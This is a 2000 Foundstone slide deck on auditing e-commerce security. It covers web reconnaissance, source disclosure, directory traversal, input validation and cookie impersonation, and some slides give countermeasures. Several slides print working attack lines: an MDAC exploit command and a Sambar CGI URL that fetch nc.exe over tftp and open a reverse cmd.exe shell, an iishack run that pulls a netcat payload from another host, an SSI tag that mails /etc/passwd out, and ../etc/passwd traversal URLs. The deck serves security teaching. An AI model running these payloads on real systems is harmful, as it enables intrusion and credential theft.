Audit and Security of E-Commerce

The attacks are going up the stack.

Copyright 2000 Foundstone, Inc.

Audit and Security of E-Commerce
Stuart McClure President/CTO Foundstone, Inc. http://www.foundstone.com stuart.mcclure@foundstone.com 949-367-1743

Copyright 2000 Foundstone, Inc.

Audit and Security of E-Commerce
Background
      

President/CTO of Foundstone, Inc. Over 10 years in IT and security Lead author of “Hacking Exposed” Digital Battlefield columnist InfoWorld “Security Watch” columnist Former E&Y Security Consultant InfoWorld product analyst
Copyright 2000 Foundstone, Inc.

Overview
eCommerce Primer Information gathering Viewing Source Application design File System Traversal Input Validation Impersonation
Copyright 2000 Foundstone, Inc.

Ecommerce Primer
“We‟re secure, we have a firewall”

Copyright 2000 Foundstone, Inc.

eCommerce Primer
Ecommerce is built on web traffic (TCP port 80) which must be allowed through ecommerce firewalls. Firewalls cannot block most of these attacks. To hack in this untamed world, knowledge of HTML, DHTML, VBScript, Jscript, Java, Javascript, Perl, CGI, Apache, IIS, Cold Fusion, CyberCash, ADO, MS Access, MDAC, MS SQL Server, and Oracle helpful and often required.
Copyright 2000 Foundstone, Inc.

Ecommerce Primer
ASCII Hex values: learn them, know them, live them
Character Space 20 Hex Character - (hyphen) 2D Hex Z Character 5A Hex

!
“ # $ % &

21
22 23 24 25 26

. (period)
/ 0 9 : ;

2E
2F 30 39 3A 3B

[
\ ] ^ _ `

5B
5C 5D 5E 5F 60

„ (apostrophe)
( ) * + , (comma)

27
28 29 2A 2B 2C

<
= > ? @ A

3C
3D 3E 3F 40 41

a
z { | } ~

61
7A 7B 7C 7D 7E

Copyright 2000 Foundstone, Inc.

eCommerce Primer
Most attackers look for the low hanging fruit first. They scan for web ports, search for vulnerable software or scripts, and then attack. The more sophisticated attacks require an in-depth knowledge of the inner workings of web scripts (all of which can be learned).
Copyright 2000 Foundstone, Inc.

Information Gathering
Gather as much information about a site as possible to understand its purpose, function, and most important, its design. Determine if any low-hanging fruit is available for picking.

Copyright 2000 Foundstone, Inc.

Information Gathering
Methodology
  


    

Web reconnaissance Vulnerability scanning Site duplication Keyword searching Email addresses External linkage Commented code Key field enumeration Scripting language enumeration
Copyright 2000 Foundstone, Inc.

Information Gathering
Web reconnaissance

Enumerate a web server searching for every web application including alternate management servers, transaction applications, certificate servers, etc. Port scanning and enumeration will reveal volumes about the target systems.

Copyright 2000 Foundstone, Inc.

Information Gathering
Web reconnaissance

Port scanning
 TCP and UDP ports 1-65535

 Common web ports

80, 81, 88, 443, 2301, 2779, 8000, 8001, 8080, etc.

Copyright 2000 Foundstone, Inc.

Information Gathering
Web reconnaissance

Port scanning
 Network Mapper (nmap) by Fyodor

(http://www.insecure.org)

[/opt]# nmap -sT -n -P0 -p 80,88,8000,2799 192.168.51.210 Starting nmap V. 2.12 by Fyodor (fyodor@dhp.com, …) Interesting ports on (192.168.51.210): Port State Protocol Service 2779 open tcp unknown

Copyright 2000 Foundstone, Inc.

Information Gathering
Web reconnaissance

Port scanning
 SuperScan by

Robin Keir (www.keir.net)

Copyright 2000 Foundstone, Inc.

Information Gathering
Web reconnaissance

Enumeration
 Web server vendor and version

 Web server directory structure
 SSL web server vendor and version  Web mind meld

Copyright 2000 Foundstone, Inc.

Information Gathering
Web reconnaissance

Enumeration
 Netcat by Hobbit (http://www.l0pht.com/~weld)


     

The Swiss Army knife of hackers TCP (both NT and Unix) and UDP (Unix only) Raw TCP or UDP connection Command/shell/program execution Source routing Port redirector Telnet server Port scanner

Copyright 2000 Foundstone, Inc.

Information Gathering
Web reconnaissance

Enumeration
 Web server vendor and version

Netcat (nc)

[/opt]# nc 192.168.51.210 2779 HEAD / HTTP/1.0 HTTP/1.1 403 Access Forbidden Server: Microsoft-IIS/5.0 Date: Sat, 26 Feb 2000 01:06:03 GMT Content-Length: 3286 Content-Type: text/html

Copyright 2000 Foundstone, Inc.

Information Gathering
Web reconnaissance

Enumeration
 Grinder 1.1

by Rhino9

Copyright 2000 Foundstone, Inc.

Information Gathering
Web reconnaissance

Enumeration
 Hidden redirection

Using HTTP-EQUIV, web sites redirect visitors to other parts of the server or other servers. An attacker can glean this information and use the new information as targets for an attack.

Copyright 2000 Foundstone, Inc.

Information Gathering
Web reconnaissance

Enumeration
 Netcat (nc) – HTTP EQUIV discovery

C:\>nc www.site.com 80 GET / HTTP/1.0 HTTP/1.1 200 OK Date: Sun, 27 Feb 2000 23:21:52 GMT Server: Microsoft-IIS/5.0 Connection: close Content-Type: text/html <HTML> <HEAD> <META HTTP-EQUIV ="Refresh" CONTENT = "0;URL=\\CDRIVE\WEB\INTRO.ASP"> </head> <BODY bgcolor="#ffffff"> </BODY> </HTML>

Copyright 2000 Foundstone, Inc.

Information Gathering
Web reconnaissance

Enumeration
 Secure Sockets Layer (SSL)

Privacy protocol implementing symmetric key cryptography (DES, RC4), authentication (RSA, DSS), and message integrity (MD5, SHA) Transport Layer Security (TSL) is the latest version of SSL. An open source toolkit for implementing SSL and TSL in applications.

 OpenSSL/SSLeay

Copyright 2000 Foundstone, Inc.

Information Gathering
Web reconnaissance

Enumeration
 OpenSSL/SSLeay
SSLeay>s_client -connect www.ramsec.com:443 CONNECTED(00000003)
HEAD / HTTP/1.0 HTTP/1.1 200 OK Server: Microsoft-IIS/4.0 Content-Location: http://216.182.36.154/index.html Date: Sat, 26 Feb 2000 00:59:07 GMT Last-Modified: Thu, 10 Feb 2000 22:52:52 GMT read:errno=0
Copyright 2000 Foundstone, Inc.

Information Gathering
Vulnerability checking

Web vulnerability scanner checking for known holes in application files and design.
 CGIscan by Bronc Buster (1998)
 Sitescan by Rhino9  Whisker by Rain Forrest Puppy (1999)

http://www.wiretrip.net/rfp

Copyright 2000 Foundstone, Inc.

Information Gathering
Vulnerability checking

Whisker (NT and Unix)

-- whisker / v1.3.0a / rain forest puppy / ADM / wiretrip -- Loaded script database of 1691 lines

= - = - = - = - = - = = Host: www.hackingexposed.com = Server: Apache/3.3.3 (Unix)
+ + + + + + + + + + + + + 404 404 404 403 404 404 404 404 404 404 404 404 404 Not Found: Not Found: Not Found: Forbidden: Not Found: Not Found: Not Found: Not Found: Not Found: Not Found: Not Found: Not Found: Not Found: GET /cfdocs/ GET /cfide/Administrator/startstop.html GET /cfappman/index.cfm GET /cgi-bin/ GET /cgi-bin/dbmlparser.exe HEAD /cgi-bin/webdist.cgi HEAD /cgi-bin/handler HEAD /mall_log_files/order.log HEAD /PDG_Cart/ HEAD /quikstore.cfg HEAD /orders/ HEAD /Admin_files/order.log Copyright 2000 Foundstone, Inc. HEAD /bigconf.cgi

Information Gathering
Site duplication

Web spider programs
 Automatic web retriever and mirroring programs that

follow every link, copying readable files such as .HTM, .HTML, .DHTML, .JHTML, .SHTML, .XML, etc.  It does not retrieve .CGI, .ASP, .CFM or dynamically generated pages.

Manual searching
 View Source
 Save As

Copyright 2000 Foundstone, Inc.

Information Gathering
Site duplication

Wget – Unix based, GNU Wget 1.5.3
 Standard on most Linux distributions or

download from http://www.freshmeat.org  “non-interactive network retriever”  HTTP and FTP retrieval  Proxy support  Authentication support  Include/exclude list of URLs
Copyright 2000 Foundstone, Inc.

Information Gathering
Wget
[/opt]# wget -r -m -v www.ramsec.com --13:33:34-- http://www.ramsec.com:80/ => `www.ramsec.com/index.html„ Connecting to www.ramsec.com:80... connected! HTTP request sent, awaiting response... 200 OK Length: 11,731 [text/html] 0K -> .......... . [100%]

13:33:35 (25.57 KB/s) - `www.ramsec.com/index.html' saved [11731/11731]

Copyright 2000 Foundstone, Inc.

Information Gathering
Site duplication

Teleport Pro 1.29 by Tennyson Maxwell Information Systems, Inc. (http://www.tenmax.com)
 Proxy support  Authentication support  Multi-threaded  Advanced filters

Copyright 2000 Foundstone, Inc.

Information Gathering
Teleport Pro results:

Copyright 2000 Foundstone, Inc.

Information Gathering
Site duplication – Countermeasures

Garbage.cgi
 Rootshell once had an obscure link on their

initial page which ran a CGI script that spit out endless amounts of data. This effectively tied up the web pilfering.

Copyright 2000 Foundstone, Inc.

Information Gathering
Keyword searching

Searching web site code to find hidden treasures such as usernames, passwords, email addresses, external links, external images, etc.

Copyright 2000 Foundstone, Inc.

Information Gathering
Keyword searching

With wget on Unix:
 grep “pass” *.html

Teleport Pro on NT:
 findstr “pass” *.html

Copyright 2000 Foundstone, Inc.

Information Gathering
Email address

Searching a web site for email addresses can unearth usernames, external relationships, and points of attack.

Copyright 2000 Foundstone, Inc.

Information Gathering
Email addresses
 

Wget (offline) Teleport Pro (offline) Sam Spade (http://www.samspade.org)
 Whois, ping, traceroute, ARIN, SMTP, finger,

etc.  Online crawl website function!

BlackWidow by SoftByteLabs.com
Copyright 2000 Foundstone, Inc.

Information Gathering
Email addresses

wget

[/opt]# grep “@” *.html index.html: For additional information, contact: </B></FONT><A HREF="mailto:info@ramsec.com"><FONT FACE=" Tahoma,Verdana,Arial,Helvetica"><B>info@ramsec.com</B></FO NT></A><FONT FACE="Tahoma,Verdana,Arial,Helvetica"> <BR></FONT>&nbsp;

index.html: HREF="mailto:webmaster@ramsec.com"><FONT SIZE="-2" FACE="Tahoma,Verdana,Arial,Helvetica">webmaster@ramse
c.com</FONT></A><FONT SIZE="-2" FACE="Tahoma,Verdana,Arial,Helvetica">&nbsp;&nbsp;&nbsp;&n bsp;&nbsp;&nbsp;&nbsp; </FONT><A
Copyright 2000 Foundstone, Inc.

Information Gathering
Email addresses

Teleport Pro

D:\>findstr "@" *.htm? about_us.html: HREF="mailto:webmaster@ramsec.com"><FONT SIZE="-2" FACE="Tahoma,Verdana,Arial,Helvetica">webmaster@ramsec.com</FONT> </A><FONT SIZE="-2" FACE="Tahoma,Verdana,Arial,Helvetica">&nbsp;&nbsp;&nbsp;&nbsp;&nb sp;&nbsp;&nbsp; </FONT><A consulting.html: HREF="mailto:webmaster@ramsec.com"><FONT SIZE="-2“ FACE="Tahoma,Verdana,Arial,Helvetica">webmaster@ramsec.com</FONT> </A><FONT SIZE="-2" FACE="Tahoma,Verdana,Arial,Helvetica">&nbsp;&nbsp;&nbsp;&nbsp;&nb sp;&nbsp;&nbsp; </FONT><A

Copyright 2000 Foundstone, Inc.

Information Gathering
Email addresses

Sam Spade

Copyright 2000 Foundstone, Inc.

Information Gathering
Email addresses

Black Widow

Copyright 2000 Foundstone, Inc.

Information Gathering
External linkage

Links to web pages or graphics on other systems than the target. An external link can imply a relationship of sorts and provide alternate targets for the attacker.

Copyright 2000 Foundstone, Inc.

Information Gathering
External linkage

Sam Spade

Copyright 2000 Foundstone, Inc.

Information Gathering
Commented code

Searching for commented code can provide insight into the site‟s design such as applications, languages used, programming hints, etc.

Copyright 2000 Foundstone, Inc.

Information Gathering
Commented code

Manual technique is most effective

Copyright 2000 Foundstone, Inc.

Information Gathering
Key field enumeration

Determining the function of each field will allow you to exploit a vulnerability in how the web server parses the particular field. For example, an ASP script did not adequately strip leading information from the id field, and a particular vulnerability existed with ASP executing code based on an escape character, one could potentially insert something like “<escape code here>type%20\boot.ini” to type the boot.ini file on the remote system.
Copyright 2000 Foundstone, Inc.

Information Gathering
Key field enumeration

Learn the name and type of key fields used in dynamic scripts (.CGI, .ASP, .CFM).

http://www.site.com/Login.asp?id=486&fu=http%3 A%2F%2Fwww%2ESramsec%2Ecom%2Fdirectory%2FDef ault%2Easp&cw=100&sf=0&kv=1&cc=9442568&Oi=1

id, fu, cw, sf, kv, cc, Oi are input fields to the login.asp script.

Copyright 2000 Foundstone, Inc.

Information Gathering
Scripting language enumeration

Where applicable, determine the type of scripting language used (Javascript, Jscript, etc). For example, the use of Javascript can allow an attacker to trick users of the system to submit confidential information such as passwords (e.g. eBay hack)
Copyright 2000 Foundstone, Inc.

Information Gathering
Scripting language enumeration

Copyright 2000 Foundstone, Inc.

Viewing Source
Numerous bugs or poor web designs allow an attacker to view web source code, for example, .ASP or .CGI code can be viewed within the browser. An attacker can discover internal web design or worse, internally used usernames and passwords for database access.
Copyright 2000 Foundstone, Inc.

Viewing Source
Methodology
 

Active Server Pages (ASP) Common Gateway Interface (CGI) ColdFusion Server (CFM)

Copyright 2000 Foundstone, Inc.

Viewing Source
ASP vulnerabilities

Dot bug (1997)
 Affected IIS 3.0  Using a trailing period (.) on ASP filenames, allowed an

attacker to view the source of the ASP script.

http://www.site.com/login.asp.

 Replacing the period (.) in the ASP filename allowed an

attacker to view the source of the ASP script.

http://www.site.com/login%23asp

Copyright 2000 Foundstone, Inc.

Viewing Source
ASP vulnerabilities

Dot bug
 Countermeasures
 

Upgrade to IIS 4.0 or above Apply the IIS 3.0 patch:

ftp://ftp.microsoft.com/bussys/IIS/iispublic/fixes/usa/security/fesrc-fix

Copyright 2000 Foundstone, Inc.

Viewing Source
ASP vulnerabilities

Alternate Data Streams bug (1998)
 Affected IIS 3.0 and 4.0

 Allowed an attacker to view the “data” portion

of an ASP script by addressing its DATA stream.

http://www.site.com/scripts/login.asp::$DATA

Copyright 2000 Foundstone, Inc.

Viewing Source
ASP vulnerabilities

Alternate Data Streams bug
 Countermeasure
 

Remove read access on files for Everyone group Apply patches  For IIS 3.0:

ftp://ftp.microsoft.com/bussys/IIS/iispublic/fixes/usa/security/iis3-datafix/

For IIS 4.0:

ftp://ftp.microsoft.com/bussys/IIS/iispublic/fixes/usa/security

Copyright 2000 Foundstone, Inc.

Viewing Source
Common Gateway Interface (CGI)

CGI design flaws
 CGI‟s that read and display an HTML file can be

tricked into reading itself and therefore displaying its contents.

http://www.site.com/index.cgi?page=main.html

Can be changed to:
http://www.site.com/index.cgi?page=index.cgi

Copyright 2000 Foundstone, Inc.

Viewing Source
ColdFusion Server
 

By Allaire (www.allaire.com) Numerous bugs in 4.0 (1999)
 Upload a file onto the web server:

http://www.site.com/cfdocs/expeval/openfile.cfm

 View a file on the web server with the

Expression Evaluator:

http://www.site.com/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c :\winnt\repair\setup.log

Copyright 2000 Foundstone, Inc.

Viewing Source
ColdFusion Server

Countermeasures
 Remove the scripts from the web server

 Apply the patch:
http://www1.allaire.com/handlers/index.cfm?ID=8727&Method=Full

Copyright 2000 Foundstone, Inc.

File System Traversal
Vulnerabilities and misconfigurations may gain unauthorized access to files and directories on the web server.

Copyright 2000 Foundstone, Inc.

File System Traversal
Methodology
 


Dot dot bugs Dot listings Tilde usage Compaq Insight Manager

Copyright 2000 Foundstone, Inc.

File System Traversal
Dot dot bugs

Web server vulnerability which allows an attacker to escape the confines of the root directory and display system files. For example:

http://www.infoworld.com/get.cgi?../../../../../../etc/passwd

Would display the passwd file on a vulnerable system.
Copyright 2000 Foundstone, Inc.

File System Traversal
Dot listings

Web server misconfiguration or vulnerability which allows an attacker to display the current directory‟s file listing. For example, the Novell‟s Groupwise Web Gateway web server allows for virtual directory displaying:
http://www.infoworld.com/us/.

Copyright 2000 Foundstone, Inc.

File System Traversal
Tilde usage

Web server vulnerability allowing an attacker to escape the root directory of the web server and view the contents of the particular user on the system. For example, might display the contents of the root user‟s directory:
http://www.infoworld.com/~root/

Copyright 2000 Foundstone, Inc.

File System Traversal
Compaq Insight Manager (CIM)
 

Re-discovered in 1999 CIM web server allowed an attacker to exploit the dot dot command in a browser to download any file on the system A good test to determine if a system is vulnerable is to look for C:\BOOT.INI

Copyright 2000 Foundstone, Inc.

Input Validation
Web applications can often be tricked into accepting invalid input for processing, making it cough up sensitive information, or worse, crash the application.

Copyright 2000 Foundstone, Inc.

Input Validation
Methodology
  


     

Metacharacters Field overflows Application buffer overflows Hex character replacement Server side includes (SSI) Hidden tags Server side debugging Extending Javascript Data access bypassing Local command execution
Copyright 2000 Foundstone, Inc.

Input Validation
Metacharacters

Depending on the input sanitation being performed on the server, it may be possible to submit metacharacters as a parameter and get the server to return unexpected results. For example:
http://www.site.com/login.cgi?..&&&&&&&&&

may actually choke the web server or produce debugging information.
Copyright 2000 Foundstone, Inc.

Input Validation
Field overflows

Poor field length checking may allow an attacker to submit large character field causing unexpected results or sometimes crashing the server (use with caution).

Copyright 2000 Foundstone, Inc.

Input Validation
Field overflows

Hidden tag SIZE

Copyright 2000 Foundstone, Inc.

Input Validation
Field overflows

Hidden tag SUBMIT

Copyright 2000 Foundstone, Inc.

Input Validation
Field overflows

Unexpected results

Copyright 2000 Foundstone, Inc.

Input Validation
Application buffer overflows

IISHACK by eEye (www.eeye.com)
 Affected IIS 4.0, SP4 or SP5

 Allowed an attacker to send a large string to

IIS and overflow .HTR, .STM, and .IDC files, overflowing the machine‟s stack.  The overflow would then execute the commands given.

Copyright 2000 Foundstone, Inc.

Input Validation
Application buffer overflows

IISHACK
 iishack.exe (program containing the buffer

overflow and initial instructions to download the ncx.exe file to be executed).  ncx.exe (slim version Netcat executing a command shell on port 80).

Copyright 2000 Foundstone, Inc.

Input Validation
Application buffer overflows

IISHACK (how to exploit)
 Setup a web server with ncx.exe in the root directory.  Run iishack.exe:
C:\NT\>iishack 192.168.51.1 80 10.1.1.1/ncx.exe

 Connect to port 80 on the target:
C:\NT\>nc 192.168.51.1 80 Microsoft(R) Windows NT(TM) (C) Copyright 1985-1996 Microsoft Corp. C:\WINNT\>

Copyright 2000 Foundstone, Inc.

Input Validation
Application buffer overflows

IISHACK countermeasure
 Apply the IIS 4.0 patch:

ftp://ftp.microsoft.com/bussys/IIS/iispublic/fixes/usa/ext-fix/

Copyright 2000 Foundstone, Inc.

Input Validation
Hex character replacement

Replacing ASCII characters with hexidecimal can bypass some IDSs looking for key strings and it may bypass initial script parsing for invalid or escape characters such as the back tick (` or %60) and ampersand (& or %36) allowing an attacker to execute commands locally and/or receive back unexpected results.
Copyright 2000 Foundstone, Inc.

Input Validation
Hex character replacement

ASCII characters can be replaced by hexidecimal to bypass initial script parsing and intrusion detection products.

Initial URL:
http://www.site.com/login.cgi?id=889&name=stu&password=10asd9as

Gets changed to:
http://www.site.com/login.cgi?id=889%26name=stu%26password=10asd9as

Copyright 2000 Foundstone, Inc.

Input Validation
Server side includes (SSI)

Allows commands to be executed locally on the system. For example, on a Unix web server allowing SSI‟s you can use the following command to mail the /etc/passwd to yourself:

<!--#exec cmd="mail me@my.org <mailto:me@my.org> < cat /etc/passwd"-->

Copyright 2000 Foundstone, Inc.

Input Validation
Hidden tags

HTML hidden tags are frequently used to store session information such as price, quantity, and purchase item. These hidden tags can be modified and resubmitted. And if no backend processing is performed, a product can be purchased for a much reduced price (e.g. – a BMW for the cost of a matchbox car.
Copyright 2000 Foundstone, Inc.

Input Validation
Server side debugging

Server side application debugging features may allow additional information to be leaked about the script‟s function

http://www.domain.com/cgi-bin/script.cgi?debug=ON, debug=TRUE).

Copyright 2000 Foundstone, Inc.

Input Validation
Extending Javascript

Sites that allow users to input information onto the site without checking for Javascript content can allow attackers to insert Javascript code to prompt users for sensitive information. For example, a recent eBay hack was accomplished by inserting Javascript code into a description of an auction item. When users selected the description they were prompted to enter their online userid and password which was sent to the attacker
Copyright 2000 Foundstone, Inc.

Input Validation
Local command execution

Vulnerabilities in web server, script parameter processing, or rogue files may allow an attacker to execute local commands on the affected systems.

Copyright 2000 Foundstone, Inc.

Input Validation
Local command execution

MDAC
 IIS‟s MDAC component has a vulnerability

where an attacker can submit commands for local execution.  Written by Rain Forest Puppy (RFP)  Exploit and fix can be found at www.wiretrip.net/rfp

Copyright 2000 Foundstone, Inc.

Input Validation
Local command execution

MDAC – detecting vulnerable systems
C:\>nc -nvv -w 2 192.168.51.1 80 GET /msadc/msadcs.dll HTTP/1.0 HTTP/1.1 200 OK Server: Microsoft-IIS/4.0 Date: Sun, 19 Dec 1999 18:32:10 GMT

Content-Type: application/x-varg Content-Length: 6

Copyright 2000 Foundstone, Inc.

Input Validation
Local command execution

MDAC – sending the exploit

C:\>mdac.pl -h 192.168.51.1 -t 192.168.51.102 -i 192.168.51.102 -p 44444 -- RDS exploit by rain forest puppy / ADM / Wiretrip -Command: cmd /c cd %SystemRoot%&&tftp -i 192.168.51.102 GET nc.exe nc.exe&&del ftptmp && attrib -r nc.exe && PROMPT=hacked $p$g && nc.exe -e cmd.exe 192.168.51.102 44444 Step 1: Trying raw driver to btcustmr.mdb winnt -> c: Success!
Copyright 2000 Foundstone, Inc.

Input Validation
Local command execution

MDAC – getting the prompt
C:\>nc -l -p 44444

Microsoft(R) Windows NT(TM)
(C) Copyright 1985-1996 Microsoft Corp.

hacked C:\WINNT>

Copyright 2000 Foundstone, Inc.

Input validation
Local command execution

Sambar CGI vulnerability (2/23/00)
 Batch files in cgi-bin allow local command

execution
 

Hello.bat Echo.bat

Copyright 2000 Foundstone, Inc.

Input validation
Local command execution

Sambar hack

http://www.site.com/cgi-bin/hello.bat?&tftp%20 -i%20GET%20nc.exe%20c:\temp\nc.exe&c:\nc.exe %20-L%20-p%204000%20-e%20cmd.exe

Copyright 2000 Foundstone, Inc.

Impersonation
Impersonating another web user can be accomplished by understanding the way authentication is performed on the server.

Copyright 2000 Foundstone, Inc.

Impersonation
Methodology
 

Determine state tracking Attempt to reverse engineer the cookie encryption method Spoof cookies to impersonate a user

Copyright 2000 Foundstone, Inc.

Impersonation
Determine state tracking

All ecommerce sites must track a users state in some manner. TCP (and therefore HTTP) is by its nature, stateless, making it difficult to associate web requests to an individual. The cookie solution.

Copyright 2000 Foundstone, Inc.

Impersonation
Determine state tracking

Cookies allow a web developer to “track” and “remember” a user while shopping by inserting information into the cookie file. Netscape:

C:\PROGRAM FILES\NETSCAPE\USERS\DEFAULT\COOKIE.TXT

IE:

C:\WINNT\PROFILES\ADMINISTRATOR\COOKIES

Copyright 2000 Foundstone, Inc.

Impersonation
Determine state tracking

Cookie breakdown
 Netscape:

.wsj.com TRUE / FALSE 1293840044 WSJIE_LOGIN igCOEhEDCsCoCUCIKtKGKbKPAqAtAABhDDFNDqDNFaFKGrHfGIHrFDGYMi

 IE:
user_type subscribed wsj.com/ 0 3567004032 30124358 1548272224 29327756 *

Copyright 2000 Foundstone, Inc.

Impersonation
Determine state tracking

Cookie Pal by Kookaburra Software (http://www.kburra.com/)

Copyright 2000 Foundstone, Inc.

Impersonation
Determine state tracking

Reverse engineer the cookie state information and you will be able to make purchases as someone else. Often based on a combination of name/password/date/time/IP address, or some relevant data. Usually some form of XOR or DES encryption.
Copyright 2000 Foundstone, Inc.

Wrap-up
Overview
      

Background and Primer Information gathering Viewing Source Application design File System Traversal Input Validation Impersonation
Copyright 2000 Foundstone, Inc.

Sign up to vote on this title
UsefulNot useful